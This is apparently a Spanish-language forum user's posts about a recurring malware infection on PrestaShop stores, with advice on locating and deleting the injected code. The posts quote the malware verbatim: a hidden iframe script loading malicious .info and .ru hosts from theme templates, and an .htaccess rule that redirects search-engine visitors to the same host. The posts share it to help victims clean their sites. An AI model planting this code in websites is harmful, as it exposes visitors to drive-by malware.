Jump to content
  • Posts

    64
  • Joined

  • Last visited

Posts posted by [email protected]

  1. Bueno os paso donde yo e encontrado este código pido por favor a toda la comunidad que si lo localizamos en otras carpetas lo publiquéis

     

    codigo a localizar en mi caso

     

    <!--c3284d--> <script type="text/javascript">

    document.write('<iframe src="http://torvaldscallthat.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

    </script><!--/c3284d-->

     

    se encuentra en

     

    public/.htaccess

     

    themes/debug.tpl/index.php

     

    en mi caso dentro de mi theme/footer.tpl/header.tpl/index.tpl

     

    prestashop/footer.tpl/header.tpl/index.tpl

     

    tools/index.php/smarty/debug.tpl/index.php/Smarty.class.php

     

    No se te olvide forzar compilación, después de realizar el cambio.

     

    Limpiar el historial reciente de tu navegador

     

    creo que no me dejo ninguno

     

    comentaros que al principio solo eliminaba de algunas carpetas y al rato de 3,4,5h estaba hay otra vez

     

    me canse y revise carpeta por carpeta lo elimine todo y se acabo por el momento

     

    un gran aporte por el compañero jordiob revisa tu web http://sitecheck.sucuri.net/scanner/

    • Like 1
  2. un poco de paciencia despues de 16h eliminando todo de todas las carpetas una por una no me a salido mas estoy instalando otra vez el modulo de twitter aver que pasa esperare hasta mañana.

    consejo personal no hay otra manera que eliminar de todas las carpetas de los archivos php y tpl revisalas una por una

    ( si eliminais todo y dejais por descuido una el cualquier carpeta saldra otra vez )

    un saludo

    • Like 1
  3. Mas tarde colgare las carpetas donde se introducen estos códigos yo eliminando todo y desinstalando los módulos de twitter hasta el momento después de mas de 16h no sea introducido otra vez (antes eliminabas y alas 2 o 3h estaba hay otra vez)

     

    es muy importante revisar carpeta por carpeta tanto php como tpl todas todas si las eliminas por completo solucionado o eso espero

     

    un saludo

     

    esto contestan desde mi hosting

     

    Los parches de seguridad deben aplicarse al Prestashop, no al servidor. En el servidor utilizamos mod_security que se trata de un módulo del servidor Web Apache que filtra una gran cantidad de ataques conocidos de la mayoría de aplicaciones. Pero por nuestra parte no podemos hacer más, la seguridad pasa por tener las aplicaciones instaladas y utilizar contraseñas seguras.

     

    Como te indicamos no vemos incidencia a solucionar por nuestra parte.

     

    Un saludo.

  4. esto es lo que me comenta mi hosting

     

    Buenos días,

     

    Los parches de seguridad deben aplicarse al Prestashop, no al servidor. En el servidor utilizamos mod_security que se trata de un módulo del servidor Web Apache que filtra una gran cantidad de ataques conocidos de la mayoría de aplicaciones. Pero por nuestra parte no podemos hacer más, la seguridad pasa por tener las aplicaciones instaladas y utilizar contraseñas seguras.

     

    Como te indicamos no vemos incidencia a solucionar por nuestra parte.

     

    Un saludo.

     

    es muy importante que todos los que tengais este problema paseis en las carpetas que lo aveis encontrado para poder contrastar con los demas

    un saludo

  5. ok aver si lo e entindido en mi carpeto public los permisos sn 775

    mi pregunta es si asingno en public a 755 y le marco injcluir todos los supdirectorios se a singnara a todas las carpetas?

    e mirado en .htaccess y el permiso es 666 esto es normal gracias

     

     

    conoceis este modulo gratuito

    http://addons.prestashop.com/es/administration/1417-protect-your-templates--protegez-vos-themes.html&adforum

  6. Hola y gracias a todos por la ayuda sin bosotros los navatillos estariamos perdidos.

     

    yo tengo el mismo problema en 5 tiendas

    hace unos dias detecte esto en mis tiendas un compañero de este foro me ayudo a elimenar todo esto y atencion los encontre en

     

    theme/debug.tpl y dentro de la carpeta theme en footer.tpl y headre.tpl lo elimine de mis 5 tiendas y despues de unos 4 dias an buelto a salir alguna solucion por que estoy muy preocupado

     

    conoceis este modulo gratuito

    http://addons.prestashop.com/es/administration/1417-protect-your-templates--protegez-vos-themes.html&adforum

     

     

    <!--c3284d--> <script type="text/javascript">

    document.write('<iframe src="http://24-procent.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

    </script><!--/c3284d-->

     

    gracias

  7. si esta como elimino y que elimino de todo esto muchas gracias

     

     

     

    #c3284d#

    <IfModule mod_rewrite.c>

    RewriteEngine On

    RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

    RewriteRule ^(.*)$ http://torvaldscallthat.info/in.cgi?16 [R=301,L]

    </IfModule>

    #/c3284d#

    # .htaccess automaticaly generated by PrestaShop e-commerce open-source solution

    # WARNING: PLEASE DO NOT MODIFY THIS FILE MANUALLY. IF NECESSARY, ADD YOUR SPECIFIC CONFIGURATION WITH THE HTACCESS GENERATOR IN BACK OFFICE

    # http://www.prestashop.com - http://www.prestashop.com/forums

     

     

    <IfModule mod_rewrite.c>

    # URL rewriting module activation

    RewriteEngine on

     

    # URL rewriting rules

    RewriteRule ^([a-z0-9]+)\-([a-z0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1-$2$3.jpg [L]

    RewriteRule ^([0-9]+)\-([0-9]+)/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1-$2.jpg [L]

    RewriteRule ^([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$1$2.jpg [L]

    RewriteRule ^([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$1$2$3.jpg [L]

    RewriteRule ^([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$1$2$3$4.jpg [L]

    RewriteRule ^([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$1$2$3$4$5.jpg [L]

    RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$1$2$3$4$5$6.jpg [L]

    RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$1$2$3$4$5$6$7.jpg [L]

    RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$7/$1$2$3$4$5$6$7$8.jpg [L]

    RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$7/$8/$1$2$3$4$5$6$7$8$9.jpg [L]

    RewriteRule ^c/([0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/c/$1$2.jpg [L]

    RewriteRule ^c/([a-zA-Z-]+)/[a-zA-Z0-9-]+\.jpg$ /img/c/$1.jpg [L]

    RewriteRule ^([0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/c/$1$2.jpg [L]

    RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]*\.html /product.php?id_product=$1 [QSA,L]

    RewriteRule ^[a-zA-Z0-9-]*/([0-9]+)\-[a-zA-Z0-9-]*\.html /product.php?id_product=$1 [QSA,L]

    RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]*(/[a-zA-Z0-9-]*)+ /category.php?id_category=$1&noredirect=1 [QSA,L]

    RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]* /category.php?id_category=$1 [QSA,L]

    RewriteRule ^([0-9]+)__([a-zA-Z0-9-]*) /supplier.php?id_supplier=$1 [QSA,L]

    RewriteRule ^([0-9]+)_([a-zA-Z0-9-]*) /manufacturer.php?id_manufacturer=$1 [QSA,L]

    RewriteRule ^content/([0-9]+)\-([a-zA-Z0-9-]*) /cms.php?id_cms=$1 [QSA,L]

    RewriteRule ^content/category/([0-9]+)\-([a-zA-Z0-9-]*) /cms.php?id_cms_category=$1 [QSA,L]

    RewriteRule ^pagina-no-encuentra$ /404.php [QSA,L]

    RewriteRule ^direccion$ /address.php [QSA,L]

    RewriteRule ^direcciones$ /addresses.php [QSA,L]

    RewriteRule ^autenticacion$ /authentication.php [QSA,L]

    RewriteRule ^mas-vendidos$ /best-sales.php [QSA,L]

    RewriteRule ^carro-de-la-compra$ /cart.php [QSA,L]

    RewriteRule ^contactenos$ /contact-form.php [QSA,L]

    RewriteRule ^descuento$ /discount.php [QSA,L]

    RewriteRule ^estado-pedido$ /guest-tracking.php [QSA,L]

    RewriteRule ^historial-de-pedidos$ /history.php [QSA,L]

    RewriteRule ^identidad$ /identity.php [QSA,L]

    RewriteRule ^fabricantes$ /manufacturer.php [QSA,L]

    RewriteRule ^mi-cuenta$ /my-account.php [QSA,L]

    RewriteRule ^nuevos-productos$ /new-products.php [QSA,L]

    RewriteRule ^carrito$ /order.php [QSA,L]

    RewriteRule ^devolucion-de-productos$ /order-follow.php [QSA,L]

    RewriteRule ^pedido-rapido$ /order-opc.php [QSA,L]

    RewriteRule ^vales$ /order-slip.php [QSA,L]

    RewriteRule ^contrasena-olvidado$ /password.php [QSA,L]

    RewriteRule ^promocion$ /prices-drop.php [QSA,L]

    RewriteRule ^buscar$ /search.php [QSA,L]

    RewriteRule ^mapa-del-sitio$ /sitemap.php [QSA,L]

    RewriteRule ^tiendas$ /stores.php [QSA,L]

    RewriteRule ^proveedores$ /supplier.php [QSA,L]

    </IfModule>

     

    # Catch 404 errors

    ErrorDocument 404 /404.php

     

    <IfModule mod_expires.c>

    ExpiresActive On

    ExpiresByType image/gif "access plus 1 month"

    ExpiresByType image/jpeg "access plus 1 month"

    ExpiresByType image/png "access plus 1 month"

    ExpiresByType text/css "access plus 1 week"

    ExpiresByType text/javascript "access plus 1 week"

    ExpiresByType application/javascript "access plus 1 week"

    ExpiresByType application/x-javascript "access plus 1 week"

    ExpiresByType image/x-icon "access plus 1 year"

    </IfModule>

     

    FileETag INode MTime Size

    <IfModule mod_deflate.c>

    AddOutputFilterByType DEFLATE text/html

    AddOutputFilterByType DEFLATE text/css

    AddOutputFilterByType DEFLATE text/javascript

    AddOutputFilterByType DEFLATE application/javascript

    AddOutputFilterByType DEFLATE application/x-javascript

    </IfModule>

  8. Fichero header.tpl y footer.tpl de tu plantilla, busca esto:

     

    <!--c3284d-->																																																		<script type="text/javascript">
    document.write('<iframe src="http://
    </script><!--/c3284d-->
    

     

    Y cargatelo.

     

    No se te olvide forzar compilación, después de realizar el cambio.

     

    elimino el codogo entero que me pones?

    4estoy desesperado con esto pierdo muchos clientes gracias

     

     

    google me comento esto

     

    Software malintencionado

     

    Google ha detectado código dañino en tu sitio. Aunque aún no se ha llegado a un estado crítico, te recomendamos que soluciones esta incidencia lo antes posible. De lo contrario, es posible que los usuarios de Google vean una página de advertencia al intentar visitar páginas de este sitio

    A continuación, se muestran algunas de las páginas infectadas, pero no es suficiente eliminar estas páginas para limpiar tu sitio. Debes identificar y solucionar las vulnerabilidades subyacentes. Cómo limpiar tu sitio

    Incidencia general

    Algunas URL de este sitio redirigen a los navegadores a páginas que instalan software malintencionado, lo que indica que los servidores que alojan las páginas de este sitio pueden contener archivos de configuración modificados (como, por ejemplo, el archivo .htaccess de Apache).

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More